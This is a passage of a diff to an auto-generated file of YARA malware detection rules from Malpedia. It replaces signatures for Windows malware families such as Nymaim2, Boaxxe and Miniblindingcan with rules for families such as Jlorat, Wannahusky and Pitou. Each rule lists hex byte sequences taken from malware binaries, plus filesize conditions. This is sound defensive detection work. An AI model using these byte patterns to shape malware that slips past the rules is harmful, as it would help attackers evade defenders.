+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.giftedcrook"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.giftedcrook_auto.yar#L1-L131"
 		license_url = "N/A"
-		logic_hash = "02d347ca93ad6009e5025efa6ae57d6d731ae049bbef6bfc036d024dce1ca79a"
+		logic_hash = "c55ae29646ee6e1fa6528687183d61d605ab3a357e4390ae9837f246340b30d4"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136437,38 +136142,32 @@ rule MALPEDIA_Win_Oceansalt_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 8b7508 57 6a00 6804020000 8d85f8f9ffff 50 }
-		$sequence_1 = { 0f8492000000 53 6a00 6a00 6a00 6802000008 }
-		$sequence_2 = { 50 56 ffd3 6a00 6880000000 6a02 }
-		$sequence_3 = { 8b4508 6a00 52 57 50 }
-		$sequence_4 = { 6a07 8d45f4 50 56 c645f400 ff15???????? 6a00 }
-		$sequence_5 = { 85c9 7e0d 80b405fcfdffff77 40 3bc1 7cf3 56 }
-		$sequence_6 = { 85ff 743c 6a00 56 }
-		$sequence_7 = { 83c404 85c0 75ce 8b8dc4fdffff }
-		$sequence_8 = { 8be8 85c0 0f841e010000 48899c24a8010000 }
-		$sequence_9 = { 442b44247c 41c1e80a e8???????? f644246010 740a }
-		$sequence_10 = { 4c8d0d2ba3ffff 41bb00020000 408a2f 413aea 0f8524f9ffff 4438942490000000 }
-		$sequence_11 = { bb00080000 3918 0f4c18 bf01000000 3bcb 0f8d8d000000 4c8d35f4c60000 }
-		$sequence_12 = { 4883c440 5d c3 4055 4883ec20 488bea 488b01 }
-		$sequence_13 = { eb4e 488b0d???????? 488d542434 e8???????? eb3b }
-		$sequence_14 = { e8???????? 4c8d9c2470060000 498b6b20 498b7328 498be3 }
-		$sequence_15 = { 488d0d54e30000 f6410820 7417 33d2 }
+		$sequence_0 = { 744f 4c8bca 4c8d05da9d0400 ba80000000 488d4c2430 e8???????? 0fb69f550a0000 }
+		$sequence_1 = { 488983300d0000 488d15b0720800 c683500d000001 488bcb e8???????? 488b457f 33ff }
+		$sequence_2 = { 4c8bc6 488d154a270500 488bcf e8???????? ba01000000 488bcf e8???????? }
+		$sequence_3 = { 0fbe4550 83c0d3 83f846 0f8794feffff 4898 0fb68402e00e0300 8b8c82bc0e0300 }
+		$sequence_4 = { e8???????? 4c8bf0 4885c0 7512 48396f60 740c 4c8d35bbff0700 }
+		$sequence_5 = { 4c8b8d50070000 4c8d05aa0f0500 488d9598060000 e8???????? 8bf8 85c0 750a }
+		$sequence_6 = { 4489442440 488d4c2450 89542438 4c8d05d2240500 44895c2430 ba18000000 4489542428 }
+		$sequence_7 = { 4c8d05d21a0500 e8???????? 8bf8 85c0 }
+		$sequence_8 = { 8bf2 4c8d0d3d500200 488be9 4c8d052b500200 488d152c500200 b901000000 e8???????? }
+		$sequence_9 = { 48896c2420 4c8d2d28dc0600 448bcf 4d0f45e8 488d1522dc0600 4d8bc5 498bcc }
 
 	condition:
-		7 of them and filesize < 212992
+		7 of them and filesize < 1605632
 }
-rule MALPEDIA_Win_Nymaim2_Auto : FILE
+rule MALPEDIA_Win_Jlorat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "9d42ecfd-461f-543d-9a58-ba44ed0f874f"
+		id = "f0bef584-e973-53d7-a046-17a467ab2308"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.nymaim2"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.nymaim2_auto.yar#L1-L133"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jlorat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jlorat_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "e64916e16c04fec69a155375e17360cf8ab01eed1bdb9780112b275d8e2ffaa7"
+		logic_hash = "6c508a88f484b849b2f103f8c11b47dfe4f6c1e48dc255ea3be8790051e1a3db"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136482,32 +136181,32 @@ rule MALPEDIA_Win_Nymaim2_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bf9 be???????? 56 8d5f14 e8???????? 59 }
-		$sequence_1 = { 33c0 eb07 8b07 8b4004 03c7 83480c04 8b07 }
-		$sequence_2 = { ff5008 51 8d4604 8bcc 896508 50 e8???????? }
-		$sequence_3 = { 5b c1f805 d3e3 8d0486 0918 8b45e8 8b5df0 }
-		$sequence_4 = { ff4008 8b06 397808 75c2 ff400c ebbd 8b5620 }
-		$sequence_5 = { 885dfc e8???????? 8d4e24 e8???????? 83ec18 8bcc 8965ec }
-		$sequence_6 = { 8d45e4 53 50 ff15???????? 6a01 8d4de4 c645fc02 }
-		$sequence_7 = { 51 56 8bf1 8975f0 c706???????? 8d4e64 c745fc04000000 }
-		$sequence_8 = { 8b00 23c7 3b02 894514 7d58 8b5508 8d1482 }
-		$sequence_9 = { e8???????? 50 8d4d08 e8???????? 85c0 0f9dc3 8d4d9c }
+		$sequence_0 = { e8???????? e9???????? 89e0 8d4d0c 8908 e8???????? 899558ffffff }
+		$sequence_1 = { eb00 8b4de0 83c134 c745f0ffffffff 89e0 8908 e8???????? }
+		$sequence_2 = { f7e2 8985d0feffff 8995d4feffff b804000000 c1e002 8b4d0c ba04000000 }
+		$sequence_3 = { eb00 8b8d7cffffff 8b45b0 894de0 0518040000 898574ffffff c745cc01000000 }
+		$sequence_4 = { e8???????? 8995c8feffff 8985ccfeffff eb00 8b8dc4feffff 8b85c8feffff 8b95ccfeffff }
+		$sequence_5 = { eb5f eb00 b801000000 83f800 7514 8b442438 8b00 }
+		$sequence_6 = { e8???????? eb00 8b4da4 83c10c c745f001000000 89e0 8d55cc }
+		$sequence_7 = { eb2a 8b4e14 8b5618 89e0 895004 8908 e8???????? }
+		$sequence_8 = { f20f1186b8010000 f20f108698010000 f20f1186d8010000 f20f108688010000 f20f108e90010000 f20f118ed0010000 f20f1186c8010000 }
+		$sequence_9 = { f20f1145d0 c745f001000000 89e0 8d55d0 895004 8908 e8???????? }
 
 	condition:
-		7 of them and filesize < 753664
+		7 of them and filesize < 10952704
 }
-rule MALPEDIA_Win_Aperetif_Auto : FILE
+rule MALPEDIA_Win_Wannahusky_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1685b19d-bab9-559e-a837-4099892bca74"
+		id = "36a1577e-36ff-5776-bdb4-d895a2d2a50b"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.aperetif"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.aperetif_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wannahusky"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wannahusky_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "8b99a188c4357f2054441c5cc8823b451c95e41e20e854ee376e3b8dd6441f0d"
+		logic_hash = "5ceb031e7aa4de1c7907749dee4ed5beefedb2e46a515067de310b2cbc83c4b9"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136521,32 +136220,32 @@ rule MALPEDIA_Win_Aperetif_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { ff7708 50 e8???????? 83c40c ff7708 8b442418 50 }
-		$sequence_1 = { f20f1186080b0000 c7452400000000 e9???????? 85c9 0f84d8050000 697528100b0000 33ff }
-		$sequence_2 = { 8bef 8d041b 50 8b442414 8b401c ff30 ff742424 }
-		$sequence_3 = { e8???????? 8d48fe b82d000000 668901 eb0c 50 8d45ee }
-		$sequence_4 = { e8???????? 8bf0 83c410 85f6 7511 68db020000 68???????? }
-		$sequence_5 = { 8bc1 c1e810 0fb6c0 c1e208 0fb68068b98700 0bd0 8bc1 }
-		$sequence_6 = { 8b5604 83c604 85d2 0f8421010000 8d4a01 8bc2 f00fb10e }
-		$sequence_7 = { f20f5ec8 0f28d1 f20f59cb f20f59542448 660f2f0d???????? 7740 f20f1005???????? }
-		$sequence_8 = { ff7508 8910 8b55e8 897004 895008 e8???????? c74310507c5c00 }
-		$sequence_9 = { eb46 8b01 52 8d55d4 c745fc00000000 52 ff5014 }
+		$sequence_0 = { c605????????02 c705????????60b04100 c705????????18000000 c705????????04000000 }
+		$sequence_1 = { 7408 8bbdf0faffff 8b0f 89442404 }
+		$sequence_2 = { ba28020000 8d8d98fbffff e8???????? 8d8500fbffff c744240810000000 }
+		$sequence_3 = { 83c008 c744240401000000 890424 ff15???????? 89ca }
+		$sequence_4 = { c705????????04000000 c705????????a0464200 c705????????e01c4100 c705????????f0b34100 c705????????00000000 }
+		$sequence_5 = { c705????????04000000 66c705????????2b03 c705????????18000000 c705????????04000000 c605????????11 c705????????80bb4100 }
+		$sequence_6 = { c785fcfaffff00000000 8b480c e8???????? ba01000000 8d8dfcfaffff 8985fcfaffff e8???????? }
+		$sequence_7 = { e8???????? 8b45cc 3b45c0 7218 8b7dc0 890424 }
+		$sequence_8 = { 56 53 83ec6c 8955c0 807d0800 ba???????? }
+		$sequence_9 = { c705????????08b44100 c705????????00000000 c705????????04000000 c705????????04000000 66c705????????1903 c605????????01 }
 
 	condition:
-		7 of them and filesize < 10500096
+		7 of them and filesize < 862208
 }
-rule MALPEDIA_Win_Carrotball_Auto : FILE
+rule MALPEDIA_Win_Dairy_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "93abea8a-2155-53fb-92a0-ba3485bf7552"
+		id = "8a558663-9225-5d4f-bf21-2e09f40cb6bc"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.carrotball_auto.yar#L1-L115"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.dairy_auto.yar#L1-L124"
 		license_url = "N/A"
-		logic_hash = "c456cd5c607eeb3fd6729b04660b73d440499731727e6676847cfbec1800428f"
+		logic_hash = "67b1fc4dc17bcf8b0cdf2ebf4577147bbf8e49b67379d73e95b1b4864059fa48"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136560,32 +136259,32 @@ rule MALPEDIA_Win_Carrotball_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 85c0 7451 6a00 68???????? ff15???????? }
-		$sequence_1 = { 6a20 6a00 68???????? 83f878 751f 68???????? }
-		$sequence_2 = { 6a00 6802000080 6a20 6a00 }
-		$sequence_3 = { 85c0 7432 8d85ecfdffff 50 ff15???????? }
-		$sequence_4 = { 68???????? ff15???????? eb36 68???????? 56 }
-		$sequence_5 = { 8d85f4fdffff 50 c785ecfdffff00000000 ff15???????? }
-		$sequence_6 = { 85c0 0f84f5000000 57 6a00 6a00 }
-		$sequence_7 = { 85c0 7451 6a00 68???????? ff15???????? eb36 }
-		$sequence_8 = { 0f84f5000000 57 6a00 6a00 }
-		$sequence_9 = { 6a04 58 6bc000 c7807430001002000000 6a04 58 6bc000 }
+		$sequence_0 = { 56 8bf2 57 81e607000080 7905 4e }
+		$sequence_1 = { 8d542410 8d442414 52 68ff030000 50 }
+		$sequence_2 = { 8bd1 83c9ff 50 f2ae 8bca }
+		$sequence_3 = { 8b44241c 57 8b3e ba2037efc6 8b08 8b4004 897c2418 }
+		$sequence_4 = { aa e8???????? 83c40c 83f8ff 0f8514ffffff e9???????? 6a10 }
+		$sequence_5 = { 7f3b ba27000000 2bd1 bf???????? 83c9ff }
+		$sequence_6 = { f2ae f7d1 2bf9 8d5c241c 8bf7 8be9 8bfb }
+		$sequence_7 = { c70701000000 e8???????? 83c404 894704 b801000000 5f 5e }
+		$sequence_8 = { f3a4 75cc 8d7c243c 83c9ff }
+		$sequence_9 = { 52 68???????? 50 e8???????? 83c410 85c0 7542 }
 
 	condition:
-		7 of them and filesize < 40960
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Evilbunny_Auto : FILE
+rule MALPEDIA_Win_Webc2_Cson_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "09358091-8a71-53e9-955e-7e0615a7395b"
+		id = "a6b87b7d-9114-5579-a68c-0816423dfdd5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.evilbunny"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.evilbunny_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.webc2_cson"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.webc2_cson_auto.yar#L1-L122"
 		license_url = "N/A"
-		logic_hash = "129d7389b0c5c744f879d0c6646586dd6514e45e4141df82d478776226b51b53"
+		logic_hash = "6b0f4d165f53805d0d2ba6ef3f6dd5489f1ced5c22f12be382e768df751280a7"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136599,32 +136298,32 @@ rule MALPEDIA_Win_Evilbunny_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { eb37 6a00 8b4df4 2b4d0c 51 8b55fc 8b4218 }
-		$sequence_1 = { 2b45e4 1b55e8 8945a0 8955a4 eb0e c745a000000000 c745a400000000 }
-		$sequence_2 = { 8b55f8 8b4218 8b550c 891401 8b450c 0fb64805 83e103 }
-		$sequence_3 = { 8b5518 c1e20e 0bc2 50 8b4508 50 e8???????? }
-		$sequence_4 = { 8d8c3a4b661aa8 894df8 8b95ccfeffff c1ea02 8b85ccfeffff c1e01e 0bd0 }
-		$sequence_5 = { 55 8bec 51 8b4508 8b4824 034d0c 894dfc }
-		$sequence_6 = { e8???????? 8b55f8 c782060c000001000000 33c0 52 8bcd 50 }
-		$sequence_7 = { e8???????? 8b858cfeffff 52 8bcd 50 8d1540f91000 e8???????? }
-		$sequence_8 = { e8???????? 83c408 8b4dfc 51 8b95e4fdffff 52 8d85e8fdffff }
-		$sequence_9 = { 8b5508 8b4238 89413c 8b4d08 8a5510 885136 b801000000 }
+		$sequence_0 = { 50 ff35???????? ff15???????? 33ff e9???????? }
+		$sequence_1 = { ff15???????? 395dfc 7463 8d8540fdffff 6800020000 50 }
+		$sequence_2 = { e8???????? 68???????? 56 e8???????? 8d85f0feffff }
+		$sequence_3 = { 3bc3 8945f8 7513 68???????? ff15???????? 59 33c0 }
+		$sequence_4 = { 57 68???????? 6a50 68???????? }
+		$sequence_5 = { 3bf3 8975f8 0f8480010000 53 68???????? b8???????? 6a03 }
+		$sequence_6 = { 83c420 6a01 58 eb02 33c0 5f 5e }
+		$sequence_7 = { 8d85ec6bfeff 50 e8???????? 59 68e8030000 }
+		$sequence_8 = { 7512 55 ffd6 57 ffd6 68???????? ff15???????? }
+		$sequence_9 = { 83c418 50 ff15???????? e9???????? 8d45c0 }
 
 	condition:
-		7 of them and filesize < 1695744
+		7 of them and filesize < 98304
 }
-rule MALPEDIA_Win_Lumar_Auto : FILE
+rule MALPEDIA_Win_Portstarter_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "66198547-c312-5005-8756-3c4d434f3dfb"
+		id = "e44ac3aa-4f26-585d-bdee-c9904fdae8c9"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.lumar"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.lumar_auto.yar#L1-L121"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.portstarter"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.portstarter_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "7775336cd5e4593c9fd91e39a7fb1823140e1a9590624def112d1a4339e9c62e"
+		logic_hash = "73b0c7ed74c72cbbc30b57a6a611882f5357bf630e7fd50ae5a5939e6bfc7459"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136638,32 +136337,34 @@ rule MALPEDIA_Win_Lumar_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 7418 8b4514 83c004 894514 8b4514 }
-		$sequence_1 = { 6a68 66898506ffffff 58 6a2f 6689850affffff 58 }
-		$sequence_2 = { 8bd9 03fe e8???????? 3bf8 7604 33c0 }
-		$sequence_3 = { e8???????? 8b7d08 8b5610 8bca 2b4e0c 0fb7df }
-		$sequence_4 = { 58 6bc005 ff5405b4 6a04 58 6bc007 }
-		$sequence_5 = { 668945b0 e8???????? 83c414 fe05???????? 8bce e8???????? 8bcb }
-		$sequence_6 = { 3bc2 753e 8b4510 85c0 74d3 }
-		$sequence_7 = { 0fb74df8 3bc1 7503 ff65e0 ebd9 }
-		$sequence_8 = { 0f2805???????? b900010000 53 56 57 }
-		$sequence_9 = { 8d842414010000 47 50 57 6a00 c7842420010000a8010000 }
+		$sequence_0 = { 4c8b9c24a8010000 4c89442448 7507 4d8b4c2408 }
+		$sequence_1 = { 4c8b8c24d8000000 4d8b5918 4d8b6318 4d8b6b08 4d8b1b 4d39e5 0f8645050000 }
+		$sequence_2 = { 4c8b9c24b8000000 498d3c03 488b842410010000 4c89d1 4c89c6 90 }
+		$sequence_3 = { 4c8b942468010000 4d21fa 4d09d5 49c1ed3f 4f8d1404 4d01ea }
+		$sequence_4 = { 4c8d6424f0 4d3b6610 0f8660030000 4881ec90000000 4889ac2488000000 488dac2488000000 }
+		$sequence_5 = { 4c8b9424d8000000 4c8ba42400010000 4c896310 4c895318 }
+		$sequence_6 = { 4c8b9424d8000000 4d39e2 0f8745010000 0f8734010000 }
+		$sequence_7 = { 4c8d6424d0 4d3b6610 0f8610020000 4881ecb0000000 }
+		$sequence_8 = { 41b800de1b00 488d15d02f0000 488d4c2420 e8???????? }
+		$sequence_9 = { 4863442430 486bc010 488d0de3061c00 4803c8 }
+		$sequence_10 = { 4883ec48 8b442458 89442424 48c744242800000000 41b800de1b00 }
+		$sequence_11 = { 488d0de3061c00 4803c8 488bc1 48634c2434 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 14216192
 }
-rule MALPEDIA_Win_Boaxxe_Auto : FILE
+rule MALPEDIA_Win_Mofksys_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5fdff2c4-9858-5230-8586-66650c6fe95c"
+		id = "e9191181-2227-59a8-bd61-7f1cd7036f61"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.boaxxe"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.boaxxe_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.mofksys"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.mofksys_auto.yar#L1-L132"
 		license_url = "N/A"
-		logic_hash = "124ce2238ea4b514d8960c521e2c44f0db9f5af3376e938bf1e4f0bfa769f279"
+		logic_hash = "8771c5394499398335ed69edffdfbaf6278241ddeb464ebd5620f11ca11db156"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136677,32 +136378,32 @@ rule MALPEDIA_Win_Boaxxe_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bc3 e8???????? 8d55d8 66b89a01 e8???????? ff75d8 68???????? }
-		$sequence_1 = { 8b542404 8bc7 e8???????? 8bce 03c9 8b442404 8d1458 }
-		$sequence_2 = { 85c0 7410 8bc3 8bd4 b905010000 e8???????? eb0d }
-		$sequence_3 = { 6a01 e8???????? 8bd8 bd80000008 85f6 740d 81ff00040000 }
-		$sequence_4 = { 64ff30 648920 8b55f0 a1???????? e8???????? 8b55f0 a1???????? }
-		$sequence_5 = { 8b4078 85c0 7420 8b54240c 8d0402 89442408 8bc6 }
-		$sequence_6 = { 8b5df8 03de 8a1b 8b7dfc 03f9 301f 46 }
-		$sequence_7 = { 7411 803c24ac 7507 807c240110 7404 33c0 5a }
-		$sequence_8 = { e8???????? 8d45d8 8b55ec e8???????? 8d45d8 8b4df4 8b55f8 }
-		$sequence_9 = { 83c9ff 32c0 f2ae f7d1 5f 92 f2ae }
+		$sequence_0 = { ff15???????? 50 ff15???????? 51 d91c24 ff15???????? 8bd0 }
+		$sequence_1 = { c1e003 eb0c ff15???????? 8b8dfcfeffff 8b590c 8b0c03 03d8 }
+		$sequence_2 = { c78558ffffff00000000 c745fcab000000 8b8d6cffffff 83c128 898d54ffffff c745fcac000000 ba???????? }
+		$sequence_3 = { ff15???????? 8bd0 8d4db0 ff15???????? 8d8d50fdffff ff15???????? c745fc07000000 }
+		$sequence_4 = { 8d4db4 ff15???????? e9???????? c745fc0a000000 833d????????00 }
+		$sequence_5 = { 83c410 6685f6 7413 668b0d???????? 51 ff15???????? e9???????? }
+		$sequence_6 = { 50 8b4dc8 51 6a01 ff15???????? 50 8b55a4 }
+		$sequence_7 = { c78540ffffff7ca44000 c78538ffffff08000000 ff15???????? 8b4dc0 68???????? 51 ffd7 }
+		$sequence_8 = { 50 8b5508 8b02 50 e8???????? ffd7 8b4da4 }
+		$sequence_9 = { 52 ff15???????? 8bd0 8d4dcc ff15???????? c745fc27000000 8b4dc8 }
 
 	condition:
-		7 of them and filesize < 1146880
+		7 of them and filesize < 401408
 }
-rule MALPEDIA_Win_Miniblindingcan_Auto : FILE
+rule MALPEDIA_Win_Oderoor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "2e31c245-b31c-5b1f-badb-b374294b1a0c"
+		id = "8af6addc-ebdd-5e5f-9273-b365bc983ffd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.miniblindingcan"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.miniblindingcan_auto.yar#L1-L130"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.oderoor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.oderoor_auto.yar#L1-L128"
 		license_url = "N/A"
-		logic_hash = "f1bc6c8d1c138b9d3da736626c3c3e7c154dc57584230d14e9675b4385ae575b"
+		logic_hash = "705d5b4a266b0c2f312f72fd5cb1e86ab39ec049fd53173701ccf137ec51b933"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -136716,34 +136417,34 @@ rule MALPEDIA_Win_Miniblindingcan_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e9???????? 81fbba470000 7513 488d0511350000 488905???????? e9???????? 81fb63450000 }
-		$sequence_1 = { 488bc6 488d1523dd0100 83e11f 48c1f805 486bc958 48030cc2 eb07 }
-		$sequence_2 = { 48893d???????? eb1b 488b0d???????? 488d15bf980100 ff15???????? 488905???????? 4183fc0a }
-		$sequence_3 = { 7478 488b03 83e20f 488907 488b4308 4803de 48894708 }
-		$sequence_4 = { 8bc0 41890c86 498b0c24 490fafc8 48c1e934 8bc9 418b048e }
-		$sequence_5 = { 8d4af3 ff15???????? 41be4c000000 498bcf 488bd0 458bc6 488be8 }
-		$sequence_6 = { 488b8a50000000 e9???????? 4055 4883ec40 488bea 488d4540 4889442430 }
-		$sequence_7 = { b835000000 0f05 c3 4c8bd1 b836000000 0f05 }
-		$sequence_8 = { 448bc7 488bce 488bd0 4c8be0 e8???????? 3bc5 7412 }
-		$sequence_9 = { 488b4c2458 c744244802000000 488d442454 4889442440 }
+		$sequence_0 = { 2deb1427d9 8c2413 b166 3b01 95 1e c194a0c0b855158d }
+		$sequence_1 = { f8 660fbdd9 6611e5 e8???????? 54 }
+		$sequence_2 = { e9???????? 6689442404 c1ce06 9c 9c 8d642440 e9???????? }
+		$sequence_3 = { 69d20a000000 e8???????? 38f4 c0f304 c1c31c 660fbafb02 89c3 }
+		$sequence_4 = { 686c193202 e8???????? 309c865a407526 b3df e04a 9b 68d69156e5 }
+		$sequence_5 = { 2b984e407fc0 c5adcaa19a9e 1882c1c921d4 06 ed }
+		$sequence_6 = { df570e 29dc 9b 7f65 197e7e a2???????? }
+		$sequence_7 = { 0fbae107 0428 55 895c240c f6d0 660fbae70f 9c }
+		$sequence_8 = { 8d642410 e9???????? 66891407 881424 9c 68f4110af5 }
+		$sequence_9 = { f1 6c aa 620b e3ed e28f 1a00 }
 
 	condition:
-		7 of them and filesize < 453632
+		7 of them and filesize < 13688832
 }
-rule MALPEDIA_Win_Deepdata_Auto : FILE
+rule MALPEDIA_Win_Pitou_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8aad3a67-fb15-5e5f-9d9e-ff6fff6a45f8"
+		id = "f9c8da4e-505e-547b-8240-9df48ee9f72d"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.deepdata"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.deepdata_auto.yar#L1-L338"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.pitou_auto.yar#L1-L112"
 		license_url = "N/A"
-		logic_hash = "a34d5234f4db9f94f6aa56b11d8ba8d09bbd4a4349792470c342c748e8726f18"
+		logic_hash = "c7a5a733d5fc2416ed190ff88c1bcfd8fd875daba5df81cd77a3f96c787c1800"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -136755,58 +136456,32 @@ rule MALPEDIA_Win_Deepdata_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 751d 68???????? ff15???????? 50 }
-		$sequence_1 = { 83d000 50 51 8bce e8???????? }
-		$sequence_2 = { b001 5d c3 8ac1 }
-		$sequence_3 = { 8bd0 8bce e8???????? 83c408 5f }
-		$sequence_4 = { 837d0800 7502 eb10 8b4508 a3???????? }
-		$sequence_5 = { 55 8bec 8b4508 32c9 85c0 }
-		$sequence_6 = { 740a 50 ff15???????? 83c404 8b8c245c010000 }
-		$sequence_7 = { 8bec 56 57 8bf9 8d7704 8bce c707???????? }
-		$sequence_8 = { e8???????? 81e3fbff0000 f20f1106 83cb08 }
-		$sequence_9 = { ff36 e8???????? 83c408 c707???????? f6450801 }
-		$sequence_10 = { 8bec 56 8bf1 c706???????? 8b4e18 83f910 7228 }
-		$sequence_11 = { 83c104 3bd3 7cf2 eb06 32c0 88442425 }
-		$sequence_12 = { e8???????? 83c40c c785c4fbffff2c020000 6a00 }
-		$sequence_13 = { 7760 8bc2 51 50 e8???????? 83c408 c7463000000000 }
-		$sequence_14 = { 64a300000000 8bf1 8b7d08 897dd0 c745d800000000 c745e800000000 c745ec0f000000 }
-		$sequence_15 = { c78560ffffff00000000 c78564ffffff00000000 c78568ffffff00000000 c7856cffffff00000000 c78550ffffff00000000 c7458800000000 }
-		$sequence_16 = { 837df401 7543 68???????? ff15???????? }
-		$sequence_17 = { 8b4dfc e8???????? 8b4dfc e8???????? 8b10 52 8b4dfc }
-		$sequence_18 = { 83c40c 83c118 6a08 50 }
-		$sequence_19 = { e8???????? 8b00 50 8b4dfc e8???????? 8bc8 }
-		$sequence_20 = { e8???????? 8b00 50 e8???????? 83c404 2bf0 }
-		$sequence_21 = { a1???????? 8b4858 ffd1 83c40c }
-		$sequence_22 = { 83c428 c645fc00 8d4d08 e8???????? c745fcffffffff 8d4d14 e8???????? }
-		$sequence_23 = { e8???????? 83c404 394508 7321 8b4dfc }
-		$sequence_24 = { 83c40c b001 5f 5b }
-		$sequence_25 = { 8bec 83ec08 894dfc 8b4dfc e8???????? 8b00 50 }
-		$sequence_26 = { 837df800 7549 837df401 7543 }
-		$sequence_27 = { 6a00 6a00 ff7514 ff75c8 ff75c0 ff75c4 }
-		$sequence_28 = { 8b4dfc e8???????? 8b16 3b10 750a 6a01 }
